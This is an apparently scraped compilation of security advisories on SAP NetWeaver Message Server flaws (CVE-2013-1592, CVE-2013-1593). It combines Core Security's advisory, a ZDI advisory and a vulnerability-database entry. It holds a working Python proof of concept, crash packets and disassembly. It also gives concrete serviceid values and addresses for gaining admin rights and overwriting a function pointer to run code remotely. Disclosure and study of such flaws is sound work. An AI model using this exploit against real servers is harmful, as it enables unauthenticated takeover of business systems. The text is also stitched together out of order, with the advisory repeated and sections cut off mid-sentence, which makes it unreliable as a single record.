The following python script is the main PoC that can be used to
reproduce all vulnerabilities described below:
/-----
import socket, struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3900)
(options, args) = parser.parse_args()
client_string = '-'+' '*39
server_name = '-'+' '*39
def send_packet(sock, packet):
packet = struct.pack("!I", len(packet)) + packet
sock.send(packet)
def receive(sock):
length = sock.recv(4)
(length, ) = struct.unpack("!I", length)
data = ""
while len(data)<length:
data+= sock.recv(length)
return (length, data)
def initialize_connection(hostname, port):
# Connect
print "[*] Connecting to", hostname, "port", port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((hostname, port))
# Send initialization packet
print "[*] Conected, sending login request"
init = '**MESSAGE**\x00' # eyecatcher
init+= '\x04' # version
init+= '\x00' # errorno
init+= client_string # toname
init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key
init+= '\x01\x08' # flag / iflag (MS_LOGIN_2)
init+= client_string # fromname
init+= '\x00\x00' # padd
send_packet(connection, init)
# Receive response
print "[*] Receiving login reply"
(length, data) = receive(connection)
# Parsing login reply
server_name = data[4+64:4+64+40]
return connection
# Main PoC body
connection = initialize_connection(options.hostname, options.port)
send_attack(connection)
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. Malicious
packets are processed by the vulnerable function '_MsJ2EE_AddStatistics'
in the 'msg_server.exe' module.
The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a
'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled
by the attacker. This struct type is defined as follows:
/-----
00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type)
00000000 senderclusterid dd ?
00000004 clusterid dd ?
00000008 serviceid dd ?
0000000C groupid dd ?
00000010 nodetype db ?
00000011 db ? ; undefined
00000012 db ? ; undefined
00000013 db ? ; undefined
00000014 totallength dd ?
00000018 currentlength dd ?
0000001C currentoffset dd ?
00000020 totalblocks db ?
00000021 currentblock db ?
00000021
00000022 db ? ; undefined
00000023 db ? ; undefined
00000024 messagetype dd ?
00000028 MSJ2EE_HEADER ends
-----/
The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the
'MSJ2EE_HEADER' to calculate an index to write into the
'j2ee_stat_services' global array, without properly validating that the
index is within the boundaries of the array. On the other hand,
'j2ee_stat_services' is a global array of 256 elements of type
'MSJ2EE_STAT_ELEMENT':
/-----
.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]
.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>)
.data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o
.data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/
This vulnerability can be used to corrupt arbitrary memory with
arbitrary values, with some restrictions. The following snippet shows
the vulnerable code within the '_MsJ2EE_AddStatistics' function:
/-----
mov edi, [ebp+pJ2eeHeader]
mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker
controls MSJ2EE_HEADER.serviceid
xor ecx, ecx
cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx
lea esi, [eax+eax*8]
lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index
without validating array bounds
-----/
Since the 'serviceid' value is first multiplied by 9 and then it is
multiplied by 8, the granularity of the memory addresses that can be
targeted for memory corruption is 0x48 bytes, which is the size of the
'MSJ2EE_STAT_ELEMENT' struct:
/-----
00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)
00000000 ; XREF:
.data:j2ee_stat_totalr
00000000 ; .data:j2ee_stat_servicesr
00000000 totalMsgCount dq ? ; XREF:
_MsJ2EE_AddStatistics+1Br
00000000 ;
_MsJ2EE_AddStatistics+2Fr ...
00000008 totalMsgLength dq ? ; XREF:
_MsJ2EE_AddStatistics+192r
00000008 ;
_MsJ2EE_AddStatistics+19Br ...
00000010 avgMsgLength dq ? ; XREF:
_MsJ2EE_AddStatistics+1C2w
00000010 ;
_MsJ2EE_AddStatistics+1C7w ...
00000018 maxLength dq ? ; XREF:
_MsJ2EE_AddStatistics+161r
00000018 ;
_MsJ2EE_AddStatistics+16Er ...
00000020 noP2PMessage dq ? ; XREF:
_MsJ2EE_AddStatistics:loc_44D442w
00000020 ;
_MsJ2EE_AddStatistics+158w ...
00000028 noP2PRequest dq ? ; XREF:
_MsJ2EE_AddStatistics+144w
00000028 ;
_MsJ2EE_AddStatistics+14Aw ...
00000030 noP2PReply dq ? ; XREF:
_MsJ2EE_AddStatistics+132w
00000030 ;
_MsJ2EE_AddStatistics+138w ...
00000038 noBroadcastMessage dq ? ; XREF:
_MsJ2EE_AddStatistics:loc_44D40Dw
00000038 ;
_MsJ2EE_AddStatistics+123w ...
00000040 noBroadcastRequest dq ? ; XREF:
_MsJ2EE_AddStatistics+10Fw
00000040 ;
_MsJ2EE_AddStatistics+115w ...
00000048 MSJ2EE_STAT_ELEMENT ends
-----/
However, it is possible to use different combinations of the
'flag/iflag' values in the Message Server packet to gain more precision
over the memory addresses that can be corrupted. Different combinations
of 'flag/iflag' values provide different memory corruption primitives,
as shown below:
/-----
At this point:
* ESI points to an arbitrary, attacker-controlled memory address
* EBX == 1
.text:0044D359 movzx eax, [ebp+msiflag]
.text:0044D35D sub eax, 0Ch
.text:0044D360 jz short loc_44D37C
.text:0044D362 sub eax, ebx
.text:0044D364 jnz short loc_44D39D
.text:0044D366 cmp [ebp+msflag], 2
.text:0044D36A jnz short loc_44D374
.text:0044D36C add [esi+40h], ebx ; iflag=0xd,
flag=2 => add 1 to [esi+0x40]
.text:0044D36F adc [esi+44h], ecx
.text:0044D372 jmp short loc_44D39D
.text:0044D374 ;
---------------------------------------------------------------------------
.text:0044D374
.text:0044D374 loc_44D374: ; CODE XREF:
_MsJ2EE_AddStatistics+7Aj
.text:0044D374 add [esi+38h], ebx ; iflag=0xd,
flag=1 => add 1 to [esi+0x38]
.text:0044D377 adc [esi+3Ch], ecx
.text:0044D37A jmp short loc_44D39D
.text:0044D37C ;
---------------------------------------------------------------------------
.text:0044D37C
.text:0044D37C loc_44D37C: ; CODE XREF:
_MsJ2EE_AddStatistics+70j
.text:0044D37C mov al, [ebp+msflag]
.text:0044D37F cmp al, 3
.text:0044D381 jnz short loc_44D38B
.text:0044D383 add [esi+30h], ebx ; iflag=0xc,
flag=3 => add 1 to [esi+0x30]
.text:0044D386 adc [esi+34h], ecx
.text:0044D389 jmp short loc_44D39D
.text:0044D38B ;
---------------------------------------------------------------------------
.text:0044D38B
.text:0044D38B loc_44D38B: ; CODE XREF:
_MsJ2EE_AddStatistics+91j
.text:0044D38B cmp al, 2
.text:0044D38D jnz short loc_44D397
.text:0044D38F add [esi+28h], ebx ; iflag=0xc,
flag=2 => add 1 to [esi+0x28]
.text:0044D392 adc [esi+2Ch], ecx
.text:0044D395 jmp short loc_44D39D
.text:0044D397 ;
---------------------------------------------------------------------------
.text:0044D397
.text:0044D397 loc_44D397: ; CODE XREF:
_MsJ2EE_AddStatistics+9Dj
.text:0044D397 add [esi+20h], ebx ; iflag=0xc,
flag=1 => add 1 to [esi+0x20]
.text:0044D39A adc [esi+24h], ecx
[...]
-----/
And the following code excerpt is always executed within the
'_MsJ2EE_AddStatistics' function, providing two more memory corruption
primitives:
/-----
.text:0044D3B7 add [esi],
ebx ;add 1 to [esi]
.text:0044D3B9 adc dword ptr [esi+4], 0
.text:0044D3BD mov eax,
[edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully
controlled by the attacker
.text:0044D3C0 cdq
.text:0044D3C1 add [esi+8],
eax ;add an arbitrary number to [esi+8]
-----/
This memory corruption vulnerability can be used by remote
unauthenticated attackers to execute arbitrary code on vulnerable
installations of SAP Netweaver, but it can also be abused to modify the
internal state of the vulnerable service in order to gain administrative
privileges within the SAP Netweaver Message Server.
A client connected to the Message Server may have administrative
privileges or not. The Message Server holds a structure of type
'MSADM_s' for each connected client, which contains information about
that very connection. Relevant parts of the 'MSADM_s' struct type are
shown below:
/-----
00000000 MSADM_s struc ; (sizeof=0x538, standard type)
00000000 ; XREF: .data:dummy_clientr
00000000 client_type dd ? ; enum MS_CLIENT_TYPE
00000004 stat dd ? ; enum MS_STAT
00000008 connection_ID dd ?
0000000C status db ?
0000000D dom db ? ; XREF: MsSFillCon+3Cw
0000000E admin_allowed db ?
0000000F db ? ; undefined
00000010 name dw 40 dup(?)
[...]
00000534 _padding db 4 dup(?)
00000538 MSADM_s ends
-----/
The 'admin_allowed' field at offset 0x0E is a boolean value that
indicates whether the connected client has administrative privileges or
not. When a new client connects, the 'MsSLoginClient' function of the
Message Server sets the proper value for the 'admin_allowed' field in
the 'MSADM_s' struct instance associated with that client:
/-----
.text:004230DC
loc_4230DC: ; CODE
XREF: MsSLoginClient+AAAj
.text:004230DC
; MsSLoginClient+B26j
.text:004230DC cmp byte ptr [edi+0Eh],
0 ; privileged client?
.text:004230E0 jnz short
loc_4230EA ; if yes, jump
.text:004230E2 mov al, byte ptr
ms_admin_allowed ; otherwise, grab the value of the
"ms_admin_allowed" global variable...
.text:004230E7 mov [edi+0Eh],
al ; ...and save it to MSADM_s.admin_allowed
-----/
So if we manage to overwrite the value of the 'ms_admin_allowed' global
variable with a value different than 0, then we can grant administrative
privileges to our unprivileged connections. In SAP Netweaver
'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global
variable is located at '0x008f17f0':
/-----
.data:008F17F0 ; int ms_admin_allowed
.data:008F17F0 ms_admin_allowed dd ? ; DATA XREF:
MsSSetMonitor+7Ew
.data:008F17F0 ; MsSLoginClient+B62r
-----/
And the 'j2ee_stat_services' global array, which is the array that can
be indexed outside its bounds, is located at '0x0090b9e0':
/-----
.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]
.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>)
.data:0090B9E0 ; DATA XREF:
_MsJ2EE_AddStatistics+24o
.data:0090B9E0 ;
_MsJ2EE_AddStatistics+4Co ...
-----/
So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be
targeting '0x008F17C8' as the base address for memory corruption. Having
in mind the different memory corruption primitives based on combinations
of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and
'flag == 0x2' in our Message Server packet we will be able to add 1 to
'[0x008F17C8+0x28]', effectively overwriting the contents of
'0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed',
all of our future connections will have administrative privileges within
the Message Server.
After gaining administrative privileges for our future connections,
there are at least two possible paths of exploitation:
1. Of
course it is not mandatory to have administrative privileges in order to
overwrite function pointers, but considering the limitation of
targetable addresses imposed by the little granularity of the memory
corruption, some of the most handy-to-exploit function pointers happened
to be accessible just for administrative connections.
2. Modify the configuration and behavior of the server. That includes
changing Message Server's runtime parameters and enabling Monitor Mode
in the affected server.
8.1.1. *Gaining remote code execution by overwriting function pointers*
Having in mind that the granularity of the memory addresses that can be
targeted for memory corruption is not that flexible (0x48 bytes) and the
limited memory corruption primitives available, it takes some effort to
find a function pointer that can be overwritten with a useful value and
which can be later triggered with a network packet.
One possibility is to overwrite one of the function pointers which are
in charge of handling the modification of Message Server parameters:
/-----
.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]
; function pointers associated to the modification of the "ms/max_sleep"
parameter
.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER
<offset aMsMax_sleep, \
.data:0087DED0 offset
MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2"
.data:0087DED0 offset
MsSSetMaxSleep>
; function pointers associated to the modification of the "ms/max_vhost"
parameter
.data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset
aMsMax_vhost, \
.data:0087DED0 offset
MsSTestInteger, \ ;<-- we can overwrite this one
.data:0087DED0 offset
MsSSetMaxVirtHost>
[...]
-----/
By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target
'0x0087DED8' as the base address for memory corruption. In this case we
can use the memory corruption primitive at address '0x0044D3C1' that
always gets executed, which will allow us to add an arbitrary number
(the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]'
effectively overwriting the function pointer shown above
('ms_changeable_parameter[1].set').
After that we need to send a 'MS_SET_PROPERTY' request, specifying
'ms/max_vhost' as the name of the property to be changed. This
'MS_SET_PROPERTY' packet will make our overwritten function pointer to
be called from the 'MsSChangeParam' function:
/-----
.text:00404DB3 loc_404DB3: ; CODE XREF:
MsSChangeParam+CDj
.text:00404DB3 lea esi, [edi+edi*2]
.text:00404DB6 mov edi, [ebp+pvalue]
.text:00404DB9 add esi, esi
.text:00404DBB mov edx,
ms_changeable_parameter.test[esi+esi]
.text:00404DC2 add esi, esi
.text:00404DC4 push edi
.text:00404DC5 push pname
.text:00404DC6 call edx ; call our
overwritten function pointer
-----/
'MS_SET_PROPERTY' packets will be ignored by the Message Server if the
requesting client does not have administrative privileges, so it is
necessary to gain administrative privileges as explained above before
using the memory corruption vulnerability to overwrite one of the
function pointers in the 'ms_changeable_parameter' global array.
8.1.2. *Modify the configuration and behavior of the server*
After gaining administrative privileges for our connections, it is
possible to perform 'MS_SET_PROPERTY' packets against the Message Server
in order to modify its configuration and behavior. That makes possible,
for example, to add virtual hosts to the load balancer, or to enable
Monitor Mode [3] (transaction SMMS) on the affected server. Enabling
Monitor Mode takes two steps:
1. Send a 'MS_SET_PROPERTY' packet with property 'name ==
"ms/monitor"', property 'value == 1'.
2. Send a 'MS_SET_PROPERTY' packet with property 'name ==
"ms/admin_port"', property 'value == 3535' (or any other arbitrary port
number).
The following python code can be used to trigger the vulnerability:
/-----
def send_attack(connection):
print "[*] Sending crash packet"
crash = '**MESSAGE**\x00' # eyecatcher
crash+= '\x04' # version
crash+= '\x00' # errorno
crash+= server_name # toname
crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key
crash+= '\x04\x0d' # flag/iflag
crash+= client_string # fromname
crash+= '\x00\x00' # padd
crash+=
"ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd"
crash+= "\x00\x00\x00\x01"
crash+= "\xff\xff\xff\xff"
crash+= "\x00\x00\x00\x00"
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
8.2.
Malicious packets are processed by the vulnerable function 'WRITE_C' in
the 'msg_server.exe' module.
The following python code can be used to trigger the vulnerability:
/-----
def send_attack(connection):
print "[*] Sending crash packet"
crash = '**MESSAGE**\x00' # eyecatcher
crash+= '\x04' # version
crash+= '\x00' # errorno
crash+= server_name # toname
crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key
crash+= '\x04\x05' # flag/iflag
crash+= client_string # fromname
crash+= '\x00\x00' # padd
crash+= "AD-EYECATCH\x00"
crash+= "\x01\x01"
crash+= "%11d" % 104
crash+= "%11d" % 1
crash+= "\x15\x00\x00\x00"
crash+= "\x20\x00\x00\xc8"
crash+= "LALA" + ' '*(20-4)
crash+= "LOLO" + ' '*(40-4)
crash+= " "*36
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
9. *Report Timeline*
. 2012-12-10:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for January 22nd,
2013. 2012-12-10:
Core sends an advisory draft with technical details and a PoC. 2012-12-11:
The SAP team confirms the reception of the issue. 2012-12-21:
SAP notifies that they concluded the analysis of the reported issues and
confirms two out of the five vulnerabilities. Vendor also notifies that
the other three reported issues were already fixed in February, 2012.
Vendor also notifies that the necessary code changes are being done and
extensive tests will follow. The corresponding security note and patches
are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21:
Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:
SAP notifies Core that they will be contacted if tests fails in order to
re-schedule the advisory publication. 2013-01-22:
First release date missed. 2013-01-28:
SAP notifies that they are still confident with releasing a security
note and patches on Feb 12th as planned. 2013-01-29:
Core acknowledges receiving the information and notifies that everything
is ready for public disclosing on Feb 12th. Core also asks additional
information regarding the patched vulnerabilities mentioned in
[2012-12-21], including links to security bulletin, CVEs, and patches in
order to verify if those patches effectively fix the reported flaws. 2013-02-01:
SAP notifies that the patched vulnerabilities mentioned in [2012-12-21]
were reported in [5] and no CVE were assigned to them. Those
vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06:
Core notifies that the patched vulnerabilities will be removed from the
advisory and asks additional information regarding the affected and
patched version numbers. 2013-02-01:
SAP notifies that the security note 1800603 will be released and that
note will provide further information regarting this vulnerability. 2013-02-13:
Advisory CORE-2012-1128 published.
10. *References*
[1] http://www.sap.com/platform/netweaver/index.epx.
[2] SAP Security note Feb 2013
https://service.sap.com/sap/support/notes/1800603.
[3]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.
[4]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.
[5] SAP Security notes Feb 2012
https//service.sap.com/sap/support/notes/1649840.
[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/.
[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/.
[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ZDI-12-111 : SAP Netweaver ABAP msg_server.exe Opcode 0x43 Remote Code
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-111
June 28, 2012
- -- CVE ID:
- -- CVSS:
10, AV:N/AC:L/Au:N/C:C/I:C/A:C
- -- Affected Vendors:
SAP
- -- Affected Products:
SAP NetWeaver
- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12407.
- -- Vendor Response:
SAP has issued an update to correct this vulnerability. More details can be
found at:
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1
0-eea7-ceb666083a6a#section40
- -- Disclosure Timeline:
2011-10-28 - Vulnerability reported to vendor
2012-06-28 - Coordinated public release of advisory
- -- Credit:
This vulnerability was discovered by:
* e6af8de8b1d4b2b6d5ba2610cbf9cd38
- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8
wsBVAwUBT+yszFVtgMGTo1scAQLv/wf+MRiEiaRsMyaVgI7MTDUo9sXprBObQ6QM
yIlVyGLjwEQrO9KsUMlCj/pfLkgjcHYpCNxcrB0+6ZgtphkIQhrB3w0sj/fjRyn1
Vuugvjazu8xffqujZ2ymaQHR+toaQjeKrtWvVbaTdJI6EFuUi+qT5MrZQfRWhE2X
uqXdLphMXYH+SRhNtD+zJhxg4U4emVvirqNJa9YLwFE0UpxGRksKCB4Cx89o2QWE
NiC9bPznAVCMOBh/R/8uROXkg1Jg9YBhEu7wzJY95Yfsl4oWpSO0cQOCF0WAWiHi
TsUy3xHAjW7gMz7v/QMleok6C/7safK/7qjJRMDrGUQO1csmlZUkAg==
=FVga
-----END PGP SIGNATURE-----
|
|
var-202001-0832
|
A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code.
Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions.
The following products are affected:
SAP Netweaver 2004s
SAP Netweaver 7.01 SR1
SAP Netweaver 7.02 SP06
SAP Netweaver 7.30 SP04.
The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
CORE-2012-1128
1. *Advisory Information*
Title: SAP Netweaver Message Server Multiple Vulnerabilities
Advisory ID: CORE-2012-1128
Advisory URL:
http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities
Date published: 2013-02-13
Date of last update: 2013-02-13
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Improper Validation of Array Index [CWE-129], Buffer overflow
[CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1592, CVE-2013-1593
3. By sending different messages,
the different vulnerabilities can be triggered.
4. *Vulnerable packages*
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
SAP released the security note 1800603 [2] regarding these issues.
7. *Credits*
Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and
Francisco Falcon, and additional research was performed by Francisco
Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by
Martin Gallo from Core Security Consulting Services. The publication of
this advisory was coordinated by Fernando Miranda from Core Advisories
Team.
8. *Technical Description / Proof of Concept Code*
The following python script is the main PoC that can be used to
reproduce all vulnerabilities described below:
/-----
import socket, struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3900)
(options, args) = parser.parse_args()
client_string = '-'+' '*39
server_name = '-'+' '*39
def send_packet(sock, packet):
packet = struct.pack("!I", len(packet)) + packet
sock.send(packet)
def receive(sock):
length = sock.recv(4)
(length, ) = struct.unpack("!I", length)
data = ""
while len(data)<length:
data+= sock.recv(length)
return (length, data)
def initialize_connection(hostname, port):
# Connect
print "[*] Connecting to", hostname, "port", port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((hostname, port))
# Send initialization packet
print "[*] Conected, sending login request"
init = '**MESSAGE**\x00' # eyecatcher
init+= '\x04' # version
init+= '\x00' # errorno
init+= client_string # toname
init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key
init+= '\x01\x08' # flag / iflag (MS_LOGIN_2)
init+= client_string # fromname
init+= '\x00\x00' # padd
send_packet(connection, init)
# Receive response
print "[*] Receiving login reply"
(length, data) = receive(connection)
# Parsing login reply
server_name = data[4+64:4+64+40]
return connection
# Main PoC body
connection = initialize_connection(options.hostname, options.port)
send_attack(connection)
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. Malicious
packets are processed by the vulnerable function '_MsJ2EE_AddStatistics'
in the 'msg_server.exe' module.
The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a
'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled
by the attacker. This struct type is defined as follows:
/-----
00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type)
00000000 senderclusterid dd ?
00000004 clusterid dd ?
00000008 serviceid dd ?
0000000C groupid dd ?
00000010 nodetype db ?
00000011 db ? ; undefined
00000012 db ? ; undefined
00000013 db ? ; undefined
00000014 totallength dd ?
00000018 currentlength dd ?
0000001C currentoffset dd ?
00000020 totalblocks db ?
00000021 currentblock db ?
00000021
00000022 db ? ; undefined
00000023 db ? ; undefined
00000024 messagetype dd ?
00000028 MSJ2EE_HEADER ends
-----/
The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the
'MSJ2EE_HEADER' to calculate an index to write into the
'j2ee_stat_services' global array, without properly validating that the
index is within the boundaries of the array. On the other hand,
'j2ee_stat_services' is a global array of 256 elements of type
'MSJ2EE_STAT_ELEMENT':
/-----
.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]
.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>)
.data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o
.data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/
This vulnerability can be used to corrupt arbitrary memory with
arbitrary values, with some restrictions. The following snippet shows
the vulnerable code within the '_MsJ2EE_AddStatistics' function:
/-----
mov edi, [ebp+pJ2eeHeader]
mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker
controls MSJ2EE_HEADER.serviceid
xor ecx, ecx
cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx
lea esi, [eax+eax*8]
lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index
without validating array bounds
-----/
Since the 'serviceid' value is first multiplied by 9 and then it is
multiplied by 8, the granularity of the memory addresses that can be
targeted for memory corruption is 0x48 bytes, which is the size of the
'MSJ2EE_STAT_ELEMENT' struct:
/-----
00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)
00000000 ; XREF:
.data:j2ee_stat_totalr
00000000 ; .data:j2ee_stat_servicesr
00000000 totalMsgCount dq ? ; XREF:
_MsJ2EE_AddStatistics+1Br
00000000 ;
_MsJ2EE_AddStatistics+2Fr ...
00000008 totalMsgLength dq ? ; XREF:
_MsJ2EE_AddStatistics+192r
00000008 ;
_MsJ2EE_AddStatistics+19Br ...
00000010 avgMsgLength dq ? ; XREF:
_MsJ2EE_AddStatistics+1C2w
00000010 ;
_MsJ2EE_AddStatistics+1C7w ...
00000018 maxLength dq ? ; XREF:
_MsJ2EE_AddStatistics+161r
00000018 ;
_MsJ2EE_AddStatistics+16Er ...
00000020 noP2PMessage dq ? ; XREF:
_MsJ2EE_AddStatistics:loc_44D442w
00000020 ;
_MsJ2EE_AddStatistics+158w ...
00000028 noP2PRequest dq ? ; XREF:
_MsJ2EE_AddStatistics+144w
00000028 ;
_MsJ2EE_AddStatistics+14Aw ...
00000030 noP2PReply dq ? ; XREF:
_MsJ2EE_AddStatistics+132w
00000030 ;
_MsJ2EE_AddStatistics+138w ...
00000038 noBroadcastMessage dq ? ; XREF:
_MsJ2EE_AddStatistics:loc_44D40Dw
00000038 ;
_MsJ2EE_AddStatistics+123w ...
00000040 noBroadcastRequest dq ? ; XREF:
_MsJ2EE_AddStatistics+10Fw
00000040 ;
_MsJ2EE_AddStatistics+115w ...
00000048 MSJ2EE_STAT_ELEMENT ends
-----/
However, it is possible to use different combinations of the
'flag/iflag' values in the Message Server packet to gain more precision
over the memory addresses that can be corrupted. Different combinations
of 'flag/iflag' values provide different memory corruption primitives,
as shown below:
/-----
At this point:
* ESI points to an arbitrary, attacker-controlled memory address
* EBX == 1
.text:0044D359 movzx eax, [ebp+msiflag]
.text:0044D35D sub eax, 0Ch
.text:0044D360 jz short loc_44D37C
.text:0044D362 sub eax, ebx
.text:0044D364 jnz short loc_44D39D
.text:0044D366 cmp [ebp+msflag], 2
.text:0044D36A jnz short loc_44D374
